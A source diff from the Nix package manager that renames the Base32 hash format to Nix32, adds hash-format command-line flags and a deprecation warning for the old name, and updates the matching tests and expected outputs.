@@ -31,7 +31,7 @@ DownstreamPlaceholder DownstreamPlaceholder::unknownDerivation( xpSettings.require(Xp::DynamicDerivations); auto compressed = compressHash(placeholder.hash, 20); auto clearText = "nix-computed-output:" - + compressed.to_string(HashFormat::Base32, false) + + compressed.to_string(HashFormat::Nix32, false) + ":" + std::string { outputName }; return DownstreamPlaceholder { hashString(HashAlgorithm::SHA256, clearText) diff --git a/src/libstore/export-import.cc b/src/libstore/export-import.cc index 48718ef84..d57b25bd7 100644 --- a/src/libstore/export-import.cc +++ b/src/libstore/export-import.cc @@ -41,7 +41,7 @@ void Store::exportPath(const StorePath & path, Sink & sink) Hash hash = hashSink.currentHash().first; if (hash != info->narHash && info->narHash != Hash(info->narHash.algo)) throw Error("hash of path '%s' has changed from '%s' to '%s'!", - printStorePath(path), info->narHash.to_string(HashFormat::Base32, true), hash.to_string(HashFormat::Base32, true)); + printStorePath(path), info->narHash.to_string(HashFormat::Nix32, true), hash.to_string(HashFormat::Nix32, true)); teeSink << exportMagic diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index 5c413aa77..2bd3a2edc 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -50,7 +50,7 @@ static void makeSymlink(const Path & link, const Path & target) void LocalStore::addIndirectRoot(const Path & path) { - std::string hash = hashString(HashAlgorithm::SHA1, path).to_string(HashFormat::Base32, false); + std::string hash = hashString(HashAlgorithm::SHA1, path).to_string(HashFormat::Nix32, false); Path realRoot = canonPath(fmt("%1%/%2%/auto/%3%", stateDir, gcRootsDir, hash)); makeSymlink(realRoot, path); } diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index ef7dd7985..7e82bae28 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -1080,7 +1080,7 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, if (hashResult.first != info.narHash) throw Error("hash mismatch importing path '%s';\n specified: %s\n got: %s", - printStorePath(info.path), info.narHash.to_string(HashFormat::Base32, true), hashResult.first.to_string(HashFormat::Base32, true)); + printStorePath(info.path), info.narHash.to_string(HashFormat::Nix32, true), hashResult.first.to_string(HashFormat::Nix32, true)); if (hashResult.second != info.narSize) throw Error("size mismatch importing path '%s';\n specified: %s\n got: %s", @@ -1096,8 +1096,8 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, if (specified.hash != actualHash.hash) { throw Error("ca hash mismatch importing path '%s';\n specified: %s\n got: %s", printStorePath(info.path), - specified.hash.to_string(HashFormat::Base32, true), - actualHash.hash.to_string(HashFormat::Base32, true)); + specified.hash.to_string(HashFormat::Nix32, true), + actualHash.hash.to_string(HashFormat::Nix32, true)); } } @@ -1389,7 +1389,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) for (auto & link : readDirectory(linksDir)) { printMsg(lvlTalkative, "checking contents of '%s'", link.name); Path linkPath = linksDir + "/" + link.name; - std::string hash = hashPath(HashAlgorithm::SHA256, linkPath).first.to_string(HashFormat::Base32, false); + std::string hash = hashPath(HashAlgorithm::SHA256, linkPath).first.to_string(HashFormat::Nix32, false); if (hash != link.name) { printError("link '%s' was modified! expected hash '%s', got '%s'", linkPath, link.name, hash); @@ -1422,7 +1422,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) if (info->narHash != nullHash && info->narHash != current.first) { printError("path '%s' was modified! expected hash '%s', got '%s'", - printStorePath(i), info->narHash.to_string(HashFormat::Base32, true), current.first.to_string(HashFormat::Base32, true)); + printStorePath(i), info->narHash.to_string(HashFormat::Nix32, true), current.first.to_string(HashFormat::Nix32, true)); if (repair) repairPath(i); else errors = true; } else { diff --git a/src/libstore/nar-info-disk-cache.cc b/src/libstore/nar-info-disk-cache.cc index e50c15939..310105c75 100644 --- a/src/libstore/nar-info-disk-cache.cc +++ b/src/libstore/nar-info-disk-cache.cc @@ -333,9 +333,9 @@ public: (std::string(info->path.name())) (narInfo ? narInfo->url : "", narInfo != 0) (narInfo ? narInfo->compression : "", narInfo != 0) - (narInfo && narInfo->fileHash ? narInfo->fileHash->to_string(HashFormat::Base32, true) : "", narInfo && narInfo->fileHash) + (narInfo && narInfo->fileHash ? narInfo->fileHash->to_string(HashFormat::Nix32, true) : "", narInfo && narInfo->fileHash) (narInfo ? narInfo->fileSize : 0, narInfo != 0 && narInfo->fileSize) - (info->narHash.to_string(HashFormat::Base32, true)) + (info->narHash.to_string(HashFormat::Nix32, true)) (info->narSize) (concatStringsSep(" ", info->shortRefs())) (info->deriver ? std::string(info->deriver->to_string()) : "", (bool) info->deriver) diff --git a/src/libstore/nar-info.cc b/src/libstore/nar-info.cc index 25e2a7d7b..d9618d04c 100644 --- a/src/libstore/nar-info.cc +++ b/src/libstore/nar-info.cc @@ -114,10 +114,10 @@ std::string NarInfo::to_string(const Store & store) const assert(compression != ""); res += "Compression: " + compression + "\n"; assert(fileHash && fileHash->algo == HashAlgorithm::SHA256); - res += "FileHash: " + fileHash->to_string(HashFormat::Base32, true) + "\n"; + res += "FileHash: " + fileHash->to_string(HashFormat::Nix32, true) + "\n"; res += "FileSize: " + std::to_string(fileSize) + "\n"; assert(narHash.algo == HashAlgorithm::SHA256); - res += "NarHash: " + narHash.to_string(HashFormat::Base32, true) + "\n"; + res += "NarHash: " + narHash.to_string(HashFormat::Nix32, true) + "\n"; res += "NarSize: " + std::to_string(narSize) + "\n"; res += "References: " + concatStringsSep(" ", shortRefs()) + "\n"; diff --git a/src/libstore/optimise-store.cc b/src/libstore/optimise-store.cc index cadf88347..b395453d1 100644 --- a/src/libstore/optimise-store.cc +++ b/src/libstore/optimise-store.cc @@ -147,10 +147,10 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, contents of the symlink (i.e. the result of readlink()), not the contents of the target (which may not even exist). */ Hash hash = hashPath(HashAlgorithm::SHA256, path).first; - debug("'%1%' has hash '%2%'", path, hash.to_string(HashFormat::Base32, true)); + debug("'%1%' has hash '%2%'", path, hash.to_string(HashFormat::Nix32, true)); /* Check if this is a known hash. */ - Path linkPath = linksDir + "/" + hash.to_string(HashFormat::Base32, false); + Path linkPath = linksDir + "/" + hash.to_string(HashFormat::Nix32, false); /* Maybe delete the link, if it has been corrupted. */ if (pathExists(linkPath)) { diff --git a/src/libstore/parsed-derivations.cc b/src/libstore/parsed-derivations.cc index 73e55a96c..72f45143d 100644 --- a/src/libstore/parsed-derivations.cc +++ b/src/libstore/parsed-derivations.cc @@ -146,7 +146,7 @@ static nlohmann::json pathInfoToJSON( auto info = store.queryPathInfo(storePath); auto & jsonPath = jsonList.emplace_back( - info->toJSON(store, false, HashFormat::Base32)); + info->toJSON(store, false, HashFormat::Nix32)); // Add the path to the object whose metadata we are including. jsonPath["path"] = store.printStorePath(storePath); diff --git a/src/libstore/path-info.cc b/src/libstore/path-info.cc index 2d7dc972f..f58e31bfd 100644 --- a/src/libstore/path-info.cc +++ b/src/libstore/path-info.cc @@ -31,9 +31,9 @@ std::string ValidPathInfo::fingerprint(const Store & store) const throw Error("cannot calculate fingerprint of path '%s' because its size is not known", store.printStorePath(path)); return - "1;" + store.printStorePath(path) + ";" - + narHash.to_string(HashFormat::Base32, true) + ";" - + std::to_string(narSize) + ";" + "1;" + store.printStorePath(path) + ";" + + narHash.to_string(HashFormat::Nix32, true) + ";" + + std::to_string(narSize) + ";" + concatStringsSep(",", store.printStorePathSet(references)); } diff --git a/src/libstore/path.cc b/src/libstore/path.cc index d5257c939..1afd10af7 100644 --- a/src/libstore/path.cc +++ b/src/libstore/path.cc @@ -35,7 +35,7 @@ StorePath::StorePath(std::string_view _baseName) } StorePath::StorePath(const Hash & hash, std::string_view _name) - : baseName((hash.to_string(HashFormat::Base32, false) + "-").append(std::string(_name))) + : baseName((hash.to_string(HashFormat::Nix32, false) + "-").append(std::string(_name))) { checkName(baseName, name()); } diff --git a/src/libutil/args.cc b/src/libutil/args.cc index 7ea1647d9..e2668c673 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -544,11 +544,45 @@ nlohmann::json Args::toJSON() return res; } +static void hashFormatCompleter(AddCompletions & completions, size_t index, std::string_view prefix) +{ + for (auto & format : hashFormats) { + if (hasPrefix(format, prefix)) { + completions.add(format); + } + } +} + +Args::Flag Args::Flag::mkHashFormatFlagWithDefault(std::string &&longName, HashFormat * hf) { + assert(*hf == nix::HashFormat::SRI); + return Flag{ + .longName = std::move(longName), + .description = "hash format ('base16', 'nix32', 'base64', 'sri'). Default: 'sri'", + .labels = {"hash-format"}, + .handler = {[hf](std::string s) { + *hf = parseHashFormat(s); + }}, + .completer = hashFormatCompleter, + }; +} + +Args::Flag Args::Flag::mkHashFormatOptFlag(std::string && longName, std::optional * ohf) { + return Flag{ + .longName = std::move(longName), + .description = "hash format ('base16', 'nix32', 'base64', 'sri').", + .labels = {"hash-format"}, + .handler = {[ohf](std::string s) { + *ohf = std::optional{parseHashFormat(s)}; + }}, + .completer = hashFormatCompleter, + }; +} + static void hashAlgoCompleter(AddCompletions & completions, size_t index, std::string_view prefix) { - for (auto & type : hashAlgorithms) - if (hasPrefix(type, prefix)) - completions.add(type); + for (auto & algo : hashAlgorithms) + if (hasPrefix(algo, prefix)) + completions.add(algo); } Args::Flag Args::Flag::mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha) diff --git a/src/libutil/args.hh b/src/libutil/args.hh index 653a9bbd6..18b0ae583 100644 --- a/src/libutil/args.hh +++ b/src/libutil/args.hh @@ -15,6 +15,7 @@ namespace nix { enum struct HashAlgorithm : char; +enum struct HashFormat : int; class MultiCommand; @@ -177,6 +178,8 @@ protected: static Flag mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha); static Flag mkHashAlgoOptFlag(std::string && longName, std::optional * oha); + static Flag mkHashFormatFlagWithDefault(std::string && longName, HashFormat * hf); + static Flag mkHashFormatOptFlag(std::string && longName, std::optional * ohf); }; /** diff --git a/src/libutil/hash.cc b/src/libutil/hash.cc index 38a29c459..30456ae5c 100644 --- a/src/libutil/hash.cc +++ b/src/libutil/hash.cc @@ -27,8 +27,9 @@ static size_t regularHashSize(HashAlgorithm type) { } -std::set hashAlgorithms = {"md5", "sha1", "sha256", "sha512" }; +const std::set hashAlgorithms = {"md5", "sha1", "sha256", "sha512" }; +const std::set hashFormats = {"base64", "nix32", "base16", "sri" }; Hash::Hash(HashAlgorithm algo) : algo(algo) { @@ -81,7 +82,7 @@ static std::string printHash16(const Hash & hash) // omitted: E O U T -const std::string base32Chars = "0123456789abcdfghijklmnpqrsvwxyz"; +const std::string nix32Chars = "0123456789abcdfghijklmnpqrsvwxyz"; static std::string printHash32(const Hash & hash) @@ -100,7 +101,7 @@ static std::string printHash32(const Hash & hash) unsigned char c = (hash.hash[i] >> j) | (i >= hash.hashSize - 1 ? 0 : hash.hash[i + 1] << (8 - j)); - s.push_back(base32Chars[c & 0x1f]); + s.push_back(nix32Chars[c & 0x1f]); } return s; @@ -110,7 +111,7 @@ static std::string printHash32(const Hash & hash) std::string printHash16or32(const Hash & hash) { assert(static_cast(hash.algo)); - return hash.to_string(hash.algo == HashAlgorithm::MD5 ? HashFormat::Base16 : HashFormat::Base32, false); + return hash.to_string(hash.algo == HashAlgorithm::MD5 ? HashFormat::Base16 : HashFormat::Nix32, false); } @@ -125,7 +126,7 @@ std::string Hash::to_string(HashFormat hashFormat, bool includeAlgo) const case HashFormat::Base16: s += printHash16(*this); break; - case HashFormat::Base32: + case HashFormat::Nix32: s += printHash32(*this); break; case HashFormat::Base64: @@ -230,8 +231,8 @@ Hash::Hash(std::string_view rest, HashAlgorithm algo, bool isSRI) for (unsigned int n = 0; n < rest.size(); ++n) { char c = rest[rest.size() - n - 1]; unsigned char digit; - for (digit = 0; digit < base32Chars.size(); ++digit) /* !!! slow */ - if (base32Chars[digit] == c) break; + for (digit = 0; digit < nix32Chars.size(); ++digit) /* !!! slow */ + if (nix32Chars[digit] == c) break; if (digit >= 32) throw BadHash("invalid base-32 hash '%s'", rest); unsigned int b = n * 5; @@ -388,7 +389,11 @@ Hash compressHash(const Hash & hash, unsigned int newSize) std::optional parseHashFormatOpt(std::string_view hashFormatName) { if (hashFormatName == "base16") return HashFormat::Base16; - if (hashFormatName == "base32") return HashFormat::Base32; + if (hashFormatName == "nix32") return HashFormat::Nix32; + if (hashFormatName == "base32") { + warn(R"("base32" is a deprecated alias for hash format "nix32".)"); + return HashFormat::Nix32; + } if (hashFormatName == "base64") return HashFormat::Base64; if (hashFormatName == "sri") return HashFormat::SRI; return std::nullopt; @@ -407,8 +412,8 @@ std::string_view printHashFormat(HashFormat HashFormat) switch (HashFormat) { case HashFormat::Base64: return "base64"; - case HashFormat::Base32: - return "base32"; + case HashFormat::Nix32: + return "nix32"; case HashFormat::Base16: return "base16"; case HashFormat::SRI: diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh index 3c97ed4b1..7bed9e2bd 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -20,9 +20,9 @@ const int sha1HashSize = 20; const int sha256HashSize = 32; const int sha512HashSize = 64; -extern std::set hashAlgorithms; +extern const std::set hashAlgorithms; -extern const std::string base32Chars; +extern const std::string nix32Chars; /** * @brief Enumeration representing the hash formats. @@ -31,8 +31,8 @@ enum struct HashFormat : int { /// @brief Base 64 encoding. /// @see [IETF RFC 4648, section 4](https://datatracker.ietf.org/doc/html/rfc4648#section-4). Base64, - /// @brief Nix-specific base-32 encoding. @see base32Chars - Base32, + /// @brief Nix-specific base-32 encoding. @see nix32Chars + Nix32, /// @brief Lowercase hexadecimal encoding. @see base16Chars Base16, /// @brief ":", format of the SRI integrity attribute. @@ -40,6 +40,8 @@ enum struct HashFormat : int { SRI }; +extern const std::set hashFormats; + struct Hash { constexpr static size_t maxHashSize = 64; diff --git a/src/libutil/references.cc b/src/libutil/references.cc index d82d51945..b30e62c7b 100644 --- a/src/libutil/references.cc +++ b/src/libutil/references.cc @@ -23,8 +23,8 @@ static void search( static bool isBase32[256]; std::call_once(initialised, [](){ for (unsigned int i = 0; i < 256; ++i) isBase32[i] = false; - for (unsigned int i = 0; i < base32Chars.size(); ++i) - isBase32[(unsigned char) base32Chars[i]] = true; + for (unsigned int i = 0; i < nix32Chars.size(); ++i) + isBase32[(unsigned char) nix32Chars[i]] = true; }); for (size_t i = 0; i + refLength <= s.size(); ) { diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 75ad4e75f..db45be2a8 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -406,7 +406,7 @@ static void opQuery(Strings opFlags, Strings opArgs) auto info = store->queryPathInfo(j); if (query == qHash) { assert(info->narHash.algo == HashAlgorithm::SHA256); - cout << fmt("%s\n", info->narHash.to_string(HashFormat::Base32, true)); + cout << fmt("%s\n", info->narHash.to_string(HashFormat::Nix32, true)); } else if (query == qSize) cout << fmt("%d\n", info->narSize); } @@ -769,8 +769,8 @@ static void opVerifyPath(Strings opFlags, Strings opArgs) if (current.first != info->narHash) { printError("path '%s' was modified! expected hash '%s', got '%s'", store->printStorePath(path), - info->narHash.to_string(HashFormat::Base32, true), - current.first.to_string(HashFormat::Base32, true)); + info->narHash.to_string(HashFormat::Nix32, true), + current.first.to_string(HashFormat::Nix32, true)); status = 1; } } @@ -898,7 +898,7 @@ static void opServe(Strings opFlags, Strings opArgs) out << info->narSize // downloadSize << info->narSize; if (GET_PROTOCOL_MINOR(clientVersion) >= 4) - out << info->narHash.to_string(HashFormat::Base32, true) + out << info->narHash.to_string(HashFormat::Nix32, true) << renderContentAddress(info->ca) << info->sigs; } catch (InvalidPath &) { diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 173043c8a..f9c7592a3 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -39,7 +39,7 @@ struct CmdHashBase : Command addFlag({ .longName = "base32", .description = "Print the hash in base-32 (Nix-specific) format.", - .handler = {&hashFormat, HashFormat::Base32}, + .handler = {&hashFormat, HashFormat::Nix32}, }); addFlag({ @@ -120,7 +120,7 @@ struct CmdToBase : Command { return fmt("convert a hash to %s representation", hashFormat == HashFormat::Base16 ? "base-16" : - hashFormat == HashFormat::Base32 ? "base-32" : + hashFormat == HashFormat::Nix32 ? "base-32" : hashFormat == HashFormat::Base64 ? "base-64" : "SRI"); } @@ -143,24 +143,8 @@ struct CmdHashConvert : Command std::vector hashStrings; CmdHashConvert(): to(HashFormat::SRI) { - addFlag({ - .longName = "from", - // TODO: List format choices. Maybe introduce a constant? - .description = "The format of the input hash.", - .labels = {"hash format"}, - .handler = {[this](std::string str) { - from = parseHashFormat(str); - }}, - }); - addFlag({ - .longName = "to", - // TODO: List format choices. Maybe introduce a constant? - .description = "The format of the output hash.", - .labels = {"hash format"}, - .handler = {[this](std::string str) { - to = parseHashFormat(str); - }}, - }); + addFlag(Args::Flag::mkHashFormatOptFlag("from", &from)); + addFlag(Args::Flag::mkHashFormatFlagWithDefault("to", &to)); addFlag(Args::Flag::mkHashAlgoOptFlag("algo", &algo)); expectArgs({ .label = "hashes", @@ -170,7 +154,15 @@ struct CmdHashConvert : Command std::string description() override { - return "convert between different hash formats, e.g. base16, nix32, base64 and sri."; + std::string descr( "convert between different hash formats. Choose from: "); + auto iter = hashFormats.begin(); + assert(iter != hashFormats.end()); + descr += *iter++; + while (iter != hashFormats.end()) { + descr += ", " + *iter++; + } + + return descr; } Category category() override { return catUtility; } @@ -197,7 +189,7 @@ struct CmdHash : NixMultiCommand {"file", []() { return make_ref(FileIngestionMethod::Flat);; }}, {"path", []() { return make_ref(FileIngestionMethod::Recursive); }}, {"to-base16", []() { return make_ref(HashFormat::Base16); }}, - {"to-base32", []() { return make_ref(HashFormat::Base32); }}, + {"to-base32", []() { return make_ref(HashFormat::Nix32); }}, {"to-base64", []() { return make_ref(HashFormat::Base64); }}, {"to-sri", []() { return make_ref(HashFormat::SRI); }}, }) @@ -230,7 +222,7 @@ static int compatNixHash(int argc, char * * argv) printVersion("nix-hash"); else if (*arg == "--flat") flat = true; else if (*arg == "--base16") hashFormat = HashFormat::Base16; - else if (*arg == "--base32") hashFormat = HashFormat::Base32; + else if (*arg == "--base32") hashFormat = HashFormat::Nix32; else if (*arg == "--base64") hashFormat = HashFormat::Base64; else if (*arg == "--sri") hashFormat = HashFormat::SRI; else if (*arg == "--truncate") truncate = true; @@ -244,7 +236,7 @@ static int compatNixHash(int argc, char * * argv) } else if (*arg == "--to-base32") { op = opTo; - hashFormat = HashFormat::Base32; + hashFormat = HashFormat::Nix32; } else if (*arg == "--to-base64") { op = opTo; diff --git a/src/nix/verify.cc b/src/nix/verify.cc index cd0f6d95f..f0234f7be 100644 --- a/src/nix/verify.cc +++ b/src/nix/verify.cc @@ -109,8 +109,8 @@ struct CmdVerify : StorePathsCommand act2.result(resCorruptedPath, store->printStorePath(info->path)); printError("path '%s' was modified! expected hash '%s', got '%s'", store->printStorePath(info->path), - info->narHash.to_string(HashFormat::Base32, true), - hash.first.to_string(HashFormat::Base32, true)); + info->narHash.to_string(HashFormat::Nix32, true), + hash.first.to_string(HashFormat::Nix32, true)); } } diff --git a/tests/functional/hash.sh b/tests/functional/hash.sh index 031e33adf..278ed83b9 100644 --- a/tests/functional/hash.sh +++ b/tests/functional/hash.sh @@ -163,7 +163,7 @@ try3() { sri=$(nix hash convert --algo "$1" --from base16 "$2") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" --from base32 "$3") + sri=$(nix hash convert --algo "$1" --from nix32 "$3") [ "$sri" = "$1-$4" ] sri=$(nix hash convert --algo "$1" --from base64 "$4") [ "$sri" = "$1-$4" ] @@ -172,11 +172,11 @@ try3() { # Asserting input format fails. # - fail=$(nix hash convert --algo "$1" --from base32 "$2" 2>&1 || echo "exit: $?") + fail=$(nix hash convert --algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?") [[ "$fail" == "error: input hash"*"exit: 1" ]] fail=$(nix hash convert --algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?") [[ "$fail" == "error: input hash"*"exit: 1" ]] - fail=$(nix hash convert --algo "$1" --from base32 "$4" 2>&1 || echo "exit: $?") + fail=$(nix hash convert --algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?") [[ "$fail" == "error: input hash"*"exit: 1" ]] } diff --git a/tests/functional/lang/eval-okay-convertHash.err.exp b/tests/functional/lang/eval-okay-convertHash.err.exp new file mode 100644 index 000000000..41d746725 --- /dev/null +++ b/tests/functional/lang/eval-okay-convertHash.err.exp @@ -0,0 +1,108 @@ +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". diff --git a/tests/functional/lang/eval-okay-convertHash.exp b/tests/functional/lang/eval-okay-convertHash.exp index 60e0a3c49..16b0240e5 100644 --- a/tests/functional/lang/eval-okay-convertHash.exp +++ b/tests/functional/lang/eval-okay-convertHash.exp @@ -1 +1 @@ -{ hashesBase16 = [ "d41d8cd98f00b204e9800998ecf8427e" "6c69ee7f211c640419d5366cc076ae46" "bb3438fbabd460ea6dbd27d153e2233b" "da39a3ee5e6b4b0d3255bfef95601890afd80709" "cd54e8568c1b37cf1e5badb0779bcbf382212189" "6d12e10b1d331dad210e47fd25d4f260802b7e77" "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" "900a4469df00ccbfd0c145c6d1e4b7953dd0afafadd7534e3a4019e8d38fc663" "ad0387b3bd8652f730ca46d25f9c170af0fd589f42e7f23f5a9e6412d97d7e56" "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e" "9d0886f8c6b389398a16257bc79780fab9831c7fc11c8ab07fa732cb7b348feade382f92617c9c5305fefba0af02ab5fd39a587d330997ff5bd0db19f7666653" "21644b72aa259e5a588cd3afbafb1d4310f4889680f6c83b9d531596a5a284f34dbebff409d23bcc86aee6bad10c891606f075c6f4755cb536da27db5693f3a7" ]; hashesBase32 = [ "3y8bwfr609h3lh9ch0izcqq7fl" "26mrvc0v1nslch8r0w45zywsbc" "1v4gi57l97pmnylq6lmgxkhd5v" "143xibwh31h9bvxzalr0sjvbbvpa6ffs" "i4hj30pkrfdpgc5dbcgcydqviibfhm6d" "fxz2p030yba2bza71qhss79k3l5y24kd" "0mdqa9w1p6cmli6976v4wi0sw9r4p5prkj7lzfd1877wk11c9c73" "0qy6iz9yh6a079757mxdmypx0gcmnzjd3ij5q78bzk00vxll82lh" "0mkygpci4r4yb8zz5rs2kxcgvw0a2yf5zlj6r8qgfll6pnrqf0xd" "0zdl9zrg8r3i9c1g90lgg9ip5ijzv3yhz91i0zzn3r8ap9ws784gkp9dk9j3aglhgf1amqb0pj21mh7h1nxcl18akqvvf7ggqsy30yg" "19ncrpp37dx0nzzjw4k6zaqkb9mzaq2myhgpzh5aff7qqcj5wwdxslg6ixwncm7gyq8l761gwf87fgsh2bwfyr52s53k2dkqvw8c24x" "2kz74snvckxldmmbisz9ikmy031d28cs6xfdbl6rhxx42glpyz4vww4lajrc5akklxwixl0js4g84233pxvmbykiic5m7i5m9r4nr11" ]; hashesBase64 = [ "1B2M2Y8AsgTpgAmY7PhCfg==" "bGnufyEcZAQZ1TZswHauRg==" "uzQ4+6vUYOptvSfRU+IjOw==" "2jmj7l5rSw0yVb/vlWAYkK/YBwk=" "zVToVowbN88eW62wd5vL84IhIYk=" "bRLhCx0zHa0hDkf9JdTyYIArfnc=" "47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=" "kApEad8AzL/QwUXG0eS3lT3Qr6+t11NOOkAZ6NOPxmM=" "rQOHs72GUvcwykbSX5wXCvD9WJ9C5/I/Wp5kEtl9flY=" "z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXcg/SpIdNs6c5H0NE8XYXysP+DGNKHfuwvY7kxvUdBeoGlODJ6+SfaPg==" "nQiG+MaziTmKFiV7x5eA+rmDHH/BHIqwf6cyy3s0j+reOC+SYXycUwX++6CvAqtf05pYfTMJl/9b0NsZ92ZmUw==" "IWRLcqolnlpYjNOvuvsdQxD0iJaA9sg7nVMVlqWihPNNvr/0CdI7zIau5rrRDIkWBvB1xvR1XLU22ifbVpPzpw==" ]; hashesSRI = [ "md5-1B2M2Y8AsgTpgAmY7PhCfg==" "md5-bGnufyEcZAQZ1TZswHauRg==" 